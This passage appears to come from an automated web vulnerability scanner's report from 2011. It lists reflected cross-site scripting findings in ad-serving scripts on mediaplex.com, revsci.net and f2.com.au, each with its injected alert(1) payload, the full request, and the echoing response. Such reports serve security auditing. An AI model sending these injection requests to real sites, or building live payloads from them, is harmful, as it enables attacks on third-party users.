Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fa38"%3balert(1)//58a2ce83bc6 was submitted in the mpvc parameter. This input was echoed as 4fa38";alert(1)//58a2ce83bc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-46%3Fmpt%3D0028f825-a3f7-465e-ab75-1ee50b08b48b&mpt=0028f825-a3f7-465e-ab75-1ee50b08b48b&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--%26redirectURL%3D4fa38"%3balert(1)//58a2ce83bc6 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:00 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:23:47 GMT
ETag: "6295e4-fba-4ac491719cec0"
Accept-Ranges: bytes
Content-Length: 5382
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
dia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p0bodL1X0jFYirZg_LEGIWXy6Wuq6WSrWZ.miW8pzGg30UHxTTKDcTbmHxcyANWVgdWID3c13ACsyoWv1.z5cbBw--&redirectURL=4fa38";alert(1)//58a2ce83bc6");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOgDAMA7.CMlMpTZo28JtWaifExoT4O87kO8n2S6p
...[SNIP]...

2.33. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fecd"-alert(1)-"ad31c053526 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f89fecd"-alert(1)-"ad31c053526&mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:40 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5370
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f89fecd"-alert(1)-"ad31c053526");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f89fecd"-alert(1
...[SNIP]...

2.34. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35585'%3balert(1)//18083999448 was submitted in the mpck parameter. This input was echoed as 35585';alert(1)//18083999448 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f835585'%3balert(1)//18083999448&mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-%26redirectURL%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:43 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5376
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-&redirectURL=http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f835585';alert(1)//18083999448" target="_blank">
...[SNIP]...

2.35. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec380'%3balert(1)//a42125f2184 was submitted in the mpvc parameter. This input was echoed as ec380';alert(1)//a42125f2184 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-%26redirectURL%3Dec380'%3balert(1)//a42125f2184 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:55 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5372
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
dia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-&redirectURL=ec380';alert(1)//a42125f2184http://cdn4.eyewonder.com/cm/ck/12963-135748-32613-45?mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8" target="_blank">
...[SNIP]...

2.36. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f3af"%3balert(1)//a5a21f89626 was submitted in the mpvc parameter. This input was echoed as 3f3af";alert(1)//a5a21f89626 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F12963-135748-32613-45%3Fmpt%3De2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpt=e2ad7d29-284a-468a-a5d2-3ed41b4188f8&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-%26redirectURL%3D3f3af"%3balert(1)//a5a21f89626 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:53 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:24:45 GMT
ETag: "82e9a3-fb0-4ac491a8ed140"
Accept-Ranges: bytes
Content-Length: 5372
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
dia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3GXfWmw4usibhS4K4KmFDmtjzqsJUP0FAU99Tws.TlCj1DggszpLNdsW502fxozM2NzEIP4vPdNLERlNevvD.pwGzw-&redirectURL=3f3af";alert(1)//a5a21f89626");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOhTAQA6.CtiYS.0nicJugQIXoqNC7.3Mqz0i2P3G
...[SNIP]...

2.37. http://img.mediaplex.com/content/0/9608/119290/ph1-gps-findyourself-728x90.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/9608/119290/ph1-gps-findyourself-728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36f80"%3balert(1)//26b30fe8258 was submitted in the mpck parameter. This input was echoed as 36f80";alert(1)//26b30fe8258 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/9608/119290/ph1-gps-findyourself-728x90.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D451434730536f80"%3balert(1)//26b30fe8258&mpt=4514347305&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=54069056=_4e677c47,4514347305,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=54069056/optn=64?trg= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:12 GMT
Server: Apache
Last-Modified: Thu, 30 Dec 2010 19:47:36 GMT
ETag: "6efc8a-c12-498a5f51a2600"
Accept-Ranges: bytes
Content-Length: 6472
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
k/site=0000799975/mnum=0000960484/cstr=54069056=_4e677c47,4514347305,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=54069056/optn=64?trg=http://adfarm.mediaplex.com/ad/ck/9608-119290-2042-5?mpt=451434730536f80";alert(1)//26b30fe8258\" target=\"_blank\">
...[SNIP]...

2.38. http://img.mediaplex.com/content/0/9608/119290/ph1-gps-findyourself-728x90.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/9608/119290/ph1-gps-findyourself-728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52687"%3balert(1)//9b5fe7461cc was submitted in the mpvc parameter. This input was echoed as 52687";alert(1)//9b5fe7461cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/9608/119290/ph1-gps-findyourself-728x90.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D4514347305&mpt=4514347305&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=54069056=_4e677c47,4514347305,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=54069056/optn=64?trg=52687"%3balert(1)//9b5fe7461cc HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:22 GMT
Server: Apache
Last-Modified: Thu, 30 Dec 2010 19:47:36 GMT
ETag: "6efc8a-c12-498a5f51a2600"
Accept-Ranges: bytes
Content-Length: 6448
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
hVars\" VALUE=\"clickTAG=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=54069056=_4e677c47,4514347305,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=54069056/optn=64?trg=52687";alert(1)//9b5fe7461cchttp://adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D4514347305&clickTag=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=54069056=_4e677c47,4514347305,799
...[SNIP]...

2.39. http://img.mediaplex.com/content/0/9608/119290/ph2_misc_longterm_728x90.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/9608/119290/ph2_misc_longterm_728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c991"%3balert(1)//9cb4a7a4bbe was submitted in the mpck parameter. This input was echoed as 5c991";alert(1)//9cb4a7a4bbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/9608/119290/ph2_misc_longterm_728x90.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D24376763225c991"%3balert(1)//9cb4a7a4bbe&mpt=2437676322&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=70524729=_4e677c44,2437676322,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=70524729/optn=64?trg= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:10 GMT
Server: Apache
Last-Modified: Thu, 30 Dec 2010 19:55:41 GMT
ETag: "5e6bfb-c07-498a61202a940"
Accept-Ranges: bytes
Content-Length: 6461
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
k/site=0000799975/mnum=0000960484/cstr=70524729=_4e677c44,2437676322,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=70524729/optn=64?trg=http://adfarm.mediaplex.com/ad/ck/9608-119290-2042-5?mpt=24376763225c991";alert(1)//9cb4a7a4bbe\" target=\"_blank\">
...[SNIP]...

2.40. http://img.mediaplex.com/content/0/9608/119290/ph2_misc_longterm_728x90.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/9608/119290/ph2_misc_longterm_728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e0f6"%3balert(1)//8131ab997d4 was submitted in the mpvc parameter. This input was echoed as 1e0f6";alert(1)//8131ab997d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/9608/119290/ph2_misc_longterm_728x90.js?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D2437676322&mpt=2437676322&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=70524729=_4e677c44,2437676322,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=70524729/optn=64?trg=1e0f6"%3balert(1)//8131ab997d4 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:20 GMT
Server: Apache
Last-Modified: Thu, 30 Dec 2010 19:55:41 GMT
ETag: "5e6bfb-c07-498a61202a940"
Accept-Ranges: bytes
Content-Length: 6437
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
hVars\" VALUE=\"clickTAG=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=70524729=_4e677c44,2437676322,799975^960484^78^0,1_/xsxdata=$XSXDATA/bnum=70524729/optn=64?trg=1e0f6";alert(1)//8131ab997d4http://adfarm.mediaplex.com%2Fad%2Fck%2F9608-119290-2042-5%3Fmpt%3D2437676322&clickTag=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=70524729=_4e677c44,2437676322,799
...[SNIP]...

2.41. http://js.revsci.net/gateway/gw.js [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload b4d9f<script>alert(1)</script>7e1b748a12 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G08769b4d9f<script>alert(1)</script>7e1b748a12 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 07 Sep 2011 14:14:43 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 08 Sep 2011 14:14:43 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:14:42 GMT
Content-Length: 127

/*
* JavaScript include error:
* The customer code "G08769B4D9F<SCRIPT>ALERT(1)</SCRIPT>7E1B748A12" was not recognized.
*/

2.42. http://mozo-widgets.f2.com.au/images/sprite-widget-17.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mozo-widgets.f2.com.au
Path:	/images/sprite-widget-17.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe631"a%3d"b"7b2b26a4785 was submitted in the REST URL parameter 1. This input was echoed as fe631"a="b"7b2b26a4785 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /imagesfe631"a%3d"b"7b2b26a4785/sprite-widget-17.png?1315376813 HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS
